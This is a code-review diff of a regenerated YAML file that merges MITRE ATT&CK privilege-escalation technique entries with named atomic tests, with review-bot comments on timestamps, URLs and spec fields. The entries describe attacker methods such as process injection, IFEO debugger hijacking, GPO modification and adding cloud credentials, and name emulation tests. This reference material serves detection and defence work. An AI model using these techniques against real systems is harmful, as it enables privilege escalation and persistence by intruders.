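Review bot: the `Microsoft CreateProcess` and `Microsoft WinExec` references are moved to `learn.microsoft.com` with refreshed retrieval dates, but `Microsoft Environment Property` and `Windows NT Command Shell` in the same block keep `docs.microsoft.com/en-us/previous-versions/...?redirectedfrom=MSDN` URLs; if the intent is to retire redirecting MSDN links, those two need the same treatment (upstream, since this file is regenerated). The rest of the hunk is ordering churn: the `x_mitre_modified_by_ref` removed in the previous hunk comes back here, and the remaining references are only resequenced.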
@@ -32123,7 +32450,7 @@ privilege-escalation:
name: powershell
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -32159,6 +32486,10 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -32170,16 +32501,12 @@ privilege-escalation:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -32215,12 +32542,12 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -32228,9 +32555,8 @@ privilege-escalation:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests:
- name: LockBit Black - Modify Group policy settings -cmd
@@ -32286,7 +32612,7 @@ privilege-escalation:
elevation_required: true
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -32301,6 +32627,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -32309,18 +32636,18 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -32352,9 +32679,6 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests:
- name: Enable Guest account with RDP capability and admin privileges
@@ -32493,7 +32817,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests:
- name: Create a new time provider
@@ -32572,7 +32895,7 @@ privilege-escalation:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
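Review bot: the `modified` timestamp for T1546.005 moves backwards here ('2021-04-29T14:49:39.188Z' → '2020-03-24T16:43:02.273Z'), and the same regression appears for most objects in the patch (T1574.006, T1134.002, T1548.001, T1546.012, T1055.013, T1574.005, T1546.008, T1055.004, T1546.009, T1055.002, T1547.015, T1134.004, T1055.015, T1546.014, T1574.010). Every replaced value shares the '.188Z' millisecond suffix and several share '14:00:00', which suggests the old values were synthesized rather than copied from the upstream STIX objects; a sentence in the PR description stating that the new timestamps are the upstream ones would stop a later reader from treating this as stale data being pulled in.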
@@ -32598,13 +32921,11 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
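Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed from T1546.005 without a replacement anywhere in that object's hunks, and the same happens for T1546.012, T1055.013, T1574.005, T1055.004, T1546.009, T1055.002 and T1547.015, whereas T1546.001 later in the patch has its 2.1.0 value replaced by 3.2.0. If the source bundle still carries the field for those objects the generator is dropping it; if it does not, the inconsistency is upstream and worth noting, but either way a consumer can no longer tell which of these objects are on the 3.x spec.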
@@ -32725,12 +33046,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -32762,11 +33082,10 @@ privilege-escalation:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -32807,11 +33126,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -32867,7 +33185,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests:
- name: Access Token Manipulation
@@ -32901,7 +33218,7 @@ privilege-escalation:
name: powershell
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -32958,7 +33275,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1547.004:
@@ -33028,7 +33344,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests:
- name: Winlogon Shell Key Persistence - PowerShell
@@ -33261,7 +33576,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -33315,7 +33629,7 @@ privilege-escalation:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -33348,8 +33662,6 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests:
- name: IFEO Add Debugger
@@ -33450,7 +33762,7 @@ privilege-escalation:
elevation_required: true
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -33512,10 +33824,9 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -33573,7 +33884,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -33615,7 +33925,7 @@ privilege-escalation:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -33674,8 +33984,6 @@ privilege-escalation:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.005:
technique:
@@ -33705,7 +34013,7 @@ privilege-escalation:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -33740,12 +34048,10 @@ privilege-escalation:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -33822,7 +34128,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests:
- name: Attaches Command Prompt as a Debugger to a List of Target Processes
@@ -33994,7 +34299,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -34043,8 +34348,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests:
- name: Process Injection via C#
@@ -34163,7 +34466,7 @@ privilege-escalation:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -34211,8 +34514,6 @@ privilege-escalation:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests:
- name: Create registry persistence via AppCert DLL
@@ -34257,7 +34558,7 @@ privilege-escalation:
elevation_required: true
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -34270,16 +34571,16 @@ privilege-escalation:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -34291,16 +34592,16 @@ privilege-escalation:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
@@ -34355,7 +34656,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.002:
technique:
@@ -34378,7 +34678,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -34422,8 +34722,6 @@ privilege-escalation:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests:
- name: Portable Executable Injection
@@ -34534,7 +34832,7 @@ privilege-escalation:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -34562,8 +34860,6 @@ privilege-escalation:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests:
- name: Persistence by modifying Windows Terminal profile
@@ -34667,7 +34963,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests:
- name: Named pipe client impersonation
@@ -34811,18 +35106,18 @@ privilege-escalation:
elevation_required: true
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -34832,11 +35127,15 @@ privilege-escalation:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
@@ -34847,12 +35146,19 @@ privilege-escalation:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
@@ -34861,6 +35167,7 @@ privilege-escalation:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -34869,13 +35176,16 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
@@ -34901,10 +35211,18 @@ privilege-escalation:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
@@ -34913,10 +35231,20 @@ privilege-escalation:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -34933,9 +35261,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1134.003:
@@ -34999,7 +35324,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -35088,7 +35412,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests:
- name: Persistence via WMI Event Subscription - CommandLineEventConsumer
@@ -35279,7 +35602,7 @@ privilege-escalation:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
